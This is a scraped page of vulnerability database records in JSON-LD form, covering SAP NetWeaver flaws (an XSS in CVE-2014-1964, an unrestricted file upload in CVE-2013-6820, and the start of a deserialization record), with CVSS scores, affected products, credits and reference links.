Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. Portal handles the vulnerability of WebDyn Pro and can leak path information. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. 4. Some of the relevant ISpeakAdapter inputs lack filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. A remote attacker can exploit a vulnerability to get sensitive information or crash an application. SAP NetWeaver is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. Multiple cross-site scripting vulnerabilities 3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201402-0240",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver exchange infrastructure \\",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver exchange infrastructure",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_exchange_infrastructure_\\(bc-xi\\):-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1964"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov, George Nosenko and Dmitry Chastukhin",
"sources": [
{
"db": "BID",
"id": "65547"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1964",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-1964",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01007",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-1964",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201402-207",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. Portal handles the vulnerability of WebDyn Pro and can leak path information. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. 4. Some of the relevant ISpeakAdapter inputs lack filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. A remote attacker can exploit a vulnerability to get sensitive information or crash an application. SAP NetWeaver is prone to multiple security vulnerabilities, including:\n1. An information-disclosure vulnerability\n2. Multiple cross-site scripting vulnerabilities\n3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1964",
"trust": 3.0
},
{
"db": "SECUNIA",
"id": "56947",
"trust": 1.6
},
{
"db": "BID",
"id": "65547",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201402-207",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"id": "VAR-201402-0240",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
],
"trust": 0.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
]
},
"last_update_date": "2023-12-18T13:39:58.067000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver has multiple vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/43676"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "NVD",
"id": "CVE-2014-1964"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/56947"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1788080"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91095"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1964"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-1964"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"date": "2014-02-14T15:55:07.563000",
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001414"
},
{
"date": "2018-12-10T19:29:03.983000",
"db": "NVD",
"id": "CVE-2014-1964"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Exchange Infrastructure Component cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001414"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-207"
}
],
"trust": 0.6
}
}
var-201311-0366
Vulnerability from variot
Unrestricted file upload vulnerability in the SAP NetWeaver Development Infrastructure (NWDI) allows remote attackers to execute arbitrary code by uploading a file with an executable extension via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0366",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver development infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver development infrastructure",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "58486"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_development_infrastructure:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6820"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin of ERPScan",
"sources": [
{
"db": "BID",
"id": "58486"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6820",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-6820",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6820",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-291",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unrestricted file upload vulnerability in the SAP NetWeaver Development Infrastructure (NWDI) allows remote attackers to execute arbitrary code by uploading a file with an executable extension via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The issue occurs because the application fails to adequately sanitize user-supplied input. \nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "BID",
"id": "58486"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6820",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005199",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-291",
"trust": 0.6
},
{
"db": "BID",
"id": "58486",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "58486"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"id": "VAR-201311-0366",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.418644048
},
"last_update_date": "2023-12-18T13:14:54.310000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "NVD",
"id": "CVE-2013-6820"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1757675"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/dsecrg-13-004-sap-netweaver-di-arbitrary-file-upload/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/dsecrg-13-004-sap-netweaver-di-arbitrary-file-upload/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6820"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6820"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "58486"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "58486"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-20T00:00:00",
"db": "BID",
"id": "58486"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"date": "2013-11-20T14:12:30.977000",
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-21T00:27:00",
"db": "BID",
"id": "58486"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005199"
},
{
"date": "2018-12-10T19:29:01.873000",
"db": "NVD",
"id": "CVE-2013-6820"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Development Infrastructure Vulnerable to arbitrary code execution",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005199"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-291"
}
],
"trust": 0.6
}
}
var-201707-1239
Vulnerability from variot
SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804. SAP NetWeaver is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause a denial-of-service condition
Show details on source website{
"@context": {
